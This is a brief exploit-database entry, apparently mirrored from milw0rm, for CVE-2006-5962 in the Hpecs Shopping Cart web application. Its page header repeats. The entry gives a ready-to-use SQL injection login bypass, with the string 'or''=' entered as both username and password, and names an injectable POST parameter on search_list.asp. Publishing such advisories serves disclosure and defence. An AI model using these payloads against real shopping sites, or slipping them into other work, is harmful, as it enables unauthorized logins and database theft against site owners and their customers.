Hpecs Shopping Cart - Remote Authentication Bypass
| EKU-ID: 10781 | CVE: CVE-2006-5962 | OSVDB-ID: |
| Author: Security Access Point | Published: 2006-11-14 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 10781 | CVE: CVE-2006-5962 | OSVDB-ID: |
| Author: Security Access Point | Published: 2006-11-14 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
vendor site:http://hpe.net/ product:hpecs shopping cart bug:injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (post) : http://site.com/search_list.asp variables: Hpecs_Find=maingroup&searchstring='[sql] ( or just post your query in the search engine ... ) laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com # milw0rm.com [2006-11-14]